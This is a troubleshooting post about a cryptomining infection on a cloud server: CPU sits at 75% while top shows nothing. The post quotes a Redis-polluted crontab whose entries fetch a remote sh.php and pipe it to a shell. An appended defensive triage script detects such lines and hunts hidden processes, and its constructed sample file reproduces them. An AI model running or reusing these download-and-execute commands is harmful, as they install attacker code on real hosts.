Recently the server's CPU usage has been sitting at around 75%. Alibaba Cloud Shield (阿里云盾) raised an alert saying there is a mining program on it, but the top command does not show any process with particularly high CPU usage:
top - 09:08:51 up 7 days, 21:20, 0 users, load average: 6.53, 6.48, 6.45
Tasks: 181 total, 1 running, 179 sleeping, 0 stopped, 1 zombie
Cpu(s): 77.8%us, 6.1%sy, 0.0%ni, 16.1%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Mem: 32946868k total, 7645184k used, 25301684k free, 722592k buffers
Swap: 0k total, 0k used, 0k free, 4216620k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
22948 root 20 0 616 4 0 R 1 0.0 0:00.46 top
1 root 20 0 117m 5996 3888 S 1 0.0 21:17.74 /sbin/init
1767 root 20 0 130m 16m 12m S 1 0.1 43:42.96 /usr/local/aegis/aegis_client/aegis_10_41/AliYunDun
1117 root 20 0 34336 4736 4200 S 0 0.0 7:24.21 /usr/local/aegis/aegis_update/AliYunDunUpdate
26901 root 20 0 2712m 567m 22m S 0 1.8 35:07.66 /root/apps/jdk1.8.0_121/bin/java -Dproc_namenode -Xmx1000m -Djava.net.preferIPv4Stack=true -Dhadoop.log.dir=/root/hadoop/hadoop-2.7.1/logs -D
1277 root 20 0 23196 2060 1524 S 0 0.0 6:24.72 /usr/local/cloudmonitor/wrapper/bin/./wrapper /usr/local/cloudmonitor/wrapper/bin/../conf/wrapper.conf wrapper.syslog.ident=cloudmonitor wrap
7741 root 20 0 6130m 950m 29m S 0 3.0 69:27.14 /root/apps/jdk1.8.0_121/bin/java -cp /root/spark/spark-2.1.4.19-bin-2.7.1/conf/:/root/spark/spark-2.1.4.19-bin-2.7.1/jars/*:/root/hadoop/hado
42 root RT 0 0 0 0 S 0 0.0 3:36.15 [migration/7]
13 root 20 0 0 0 0 S 0 0.0 4:13.37 [ksoftirqd/1]
12 root RT 0 0 0 0 S 0 0.0 3:42.04 [migration/1]
15 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/1:0H]
16 root RT 0 0 0 0 S 0 0.0 0:01.70 [watchdog/2]
17 root RT 0 0 0 0 S 0 0.0 2:07.48 [migration/2]
9 root RT 0 0 0 0 S 0 0.0 1:57.28 [migration/0]
20 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/2:0H]
21 root RT 0 0 0 0 S 0 0.0 0:01.97 [watchdog/3]
22 root RT 0 0 0 0 S 0 0.0 6:07.52 [migration/3]
23 root 20 0 0 0 0 S 0 0.0 5:42.32 [ksoftirqd/3]
25 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/3:0H]
26 root RT 0 0 0 0 S 0 0.0 0:02.08 [watchdog/4]
27 root RT 0 0 0 0 S 0 0.0 1:52.24 [migration/4]
28 root 20 0 0 0 0 S 0 0.0 3:41.09 [ksoftirqd/4]
30 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/4:0H]
8 root 20 0 0 0 0 S 0 0.0 0:00.00 [rcu_bh]
10 root RT 0 0 0 0 S 0 0.0 0:02.24 [watchdog/0]
33 root 20 0 0 0 0 S 0 0.0 4:11.14 [ksoftirqd/5]
32 root RT 0 0 0 0 S 0 0.0 3:36.46 [migration/5]
36 root RT 0 0 0 0 S 0 0.0 0:02.05 [watchdog/6]
35 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/5:0H]
38 root 20 0 0 0 0 S 0 0.0 3:39.25 [ksoftirqd/6]
40 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/6:0H]
41 root RT 0 0 0 0 S 0 0.0 0:01.97 [watchdog/7]
37 root RT 0 0 0 0 S 0 0.0 1:52.30 [migration/6]
43 root 20 0 0 0 0 S 0 0.0 4:06.41 [ksoftirqd/7]
45 root 0 -20 0 0 0 S 0 0.0 0:00.00 [kworker/7:0H]
46 root 20 0 0 0 0 S 0 0.0 0:00.00 [kdevtmpfs]
47 root 0 -20 0 0 0 S 0 0.0 0:00.00 [netns]
48 root 0 -20 0 0 0 S 0 0.0 0:00.00 [perf]
Then, in the /var/spool/crontab directory I found a scheduled script:
REDIS0007ú redis-ver^F3.2.11ú
redis-bitsÀ@ú^EctimeÂI{»Zú^Hused-memÂxÖ^L^@þ^@û^D^@^@^HJsDhtGeK@I
*/5 * * * * /usr/bin/wget -q -O- http://cdn.namunil.com/sh.php|/bin/sh
^@^HFQysiMRk4
*/2 * * * * curl http://cdn.namunil.com/sh.php|sh
^@^FdseINi8
*/2 * * * * wget -O- http://cdn.namunil.com/sh.php|sh
^@^HJPYAqMif@F
*/5 * * * * /usr/bin/curl -qs http://cdn.namunil.com/sh.php|/bin/sh
ÿÖX*µTAÄg
It is unmistakably a mining script, but how should I go about investigating next? I tried to download the mining script and it cannot be downloaded. CPU is still at around 75%.
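Added triage script for the two problems in this post (example code written for this page, not from the poster or from any vendor): the cron file contains download-and-pipe-to-shell entries (it also begins with a `REDIS0007` RDB header, which is what a Redis instance writing its dump into the cron spool leaves behind), and the CPU is busy while top shows no culprit, a symptom consistent with a user-space process hider loaded through /etc/ld.so.preload that filters readdir() results for ps, top and `ls /proc`. The crontab paths scanned, the `--live` flag and the sample file contents are assumptions; the sample file is constructed to resemble the RDB-polluted crontab above, not a real capture.

```shell
#!/bin/sh
# Triage helpers for "CPU high, top shows nothing, cron pulls a remote sh.php".
# Example code, not from the original post. Paths, the --live flag and the
# sample file are assumptions / constructed.

# 1. Pull download-and-pipe-to-shell lines out of crontab files.
#    -a forces text mode so an RDB-polluted (binary) file still yields its
#    lines instead of "Binary file matches".
cron_pipe_to_shell() {
    grep -aEh '(wget|curl)[^|]*\|[ ]*(/bin/)?(ba)?sh' "$@" 2>/dev/null | sort -u
}

# 2a. /etc/ld.so.preload is how user-space process hiders (readdir hooks)
#     get mapped into every dynamically linked program, ps and top included.
preload_entries() {
    [ -s /etc/ld.so.preload ] && cat /etc/ld.so.preload
    return 0
}

# 2b. PID list that does not depend on readdir(): stat() /proc/<pid> for every
#     candidate PID up to pid_max. A readdir hook filters directory listings
#     but cannot filter a direct stat on a path. Slow on hosts with a large
#     pid_max, but that is the point: it bypasses the hooked code path.
pids_by_stat() {
    max=$(cat /proc/sys/kernel/pid_max 2>/dev/null || echo 32768)
    pid=1
    while [ "$pid" -le "$max" ]; do
        [ -d "/proc/$pid" ] && echo "$pid"
        pid=$((pid + 1))
    done
}

# 2c. PID list as ps sees it (possibly filtered by a hook).
pids_by_ps() {
    ps -eo pid= | tr -d ' '
}

# Entries present in list $1 but absent from list $2 (newline separated).
# Pure text processing, so it can be exercised offline with constructed lists.
pids_missing_from() {
    { printf '%s\n' "$2"; echo '--'; printf '%s\n' "$1"; } |
    awk '$0 == "--" { second = 1; next }
         !second    { seen[$0] = 1; next }
         $0 != "" && !($0 in seen)' | sort -un
}

# Constructed sample (not a real capture) mimicking the RDB-polluted crontab
# in the post: RDB header, binary key bytes, two cron lines, trailing bytes.
write_sample_crontab() {
    printf 'REDIS0007\372\tredis-ver\0063.2.11\372\n' > "$1"
    printf '\000\010JsDhtGeK@I\n' >> "$1"
    printf '*/5 * * * * /usr/bin/wget -q -O- http://cdn.namunil.com/sh.php|/bin/sh\n' >> "$1"
    printf '\000\010FQysiMRk4\n' >> "$1"
    printf '*/2 * * * * curl http://cdn.namunil.com/sh.php|sh\n' >> "$1"
    printf '\377\326X*\265TA\304g\n' >> "$1"
}

# Live run on the suspect host (root). Crontab locations are assumptions
# covering common distributions.
triage_live() {
    echo "== /etc/ld.so.preload =="
    preload_entries
    echo "== cron entries that download and pipe to a shell =="
    cron_pipe_to_shell /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/*
    echo "== PIDs reachable via stat() but missing from ps =="
    hidden=$(pids_missing_from "$(pids_by_stat)" "$(pids_by_ps)")
    for p in $hidden; do
        printf '%s %s\n' "$p" "$(tr '\0' ' ' < "/proc/$p/cmdline" 2>/dev/null)"
    done
}

if [ "${1:-}" = "--live" ]; then
    triage_live
fi
```

Run it as `sh triage.sh --live` as root. A PID that exits between the stat() sweep and the ps snapshot shows up as a false positive, so rerun before acting on a hit; a kernel-level rootkit can hide from stat() as well, so an empty result is not proof of absence. Since the host is already compromised, prefer doing the same checks with statically linked tools copied from a known-good system, and plan to rebuild the box once the persistence (here the cron entries and whatever sh.php installs) and the mining binary have been identified.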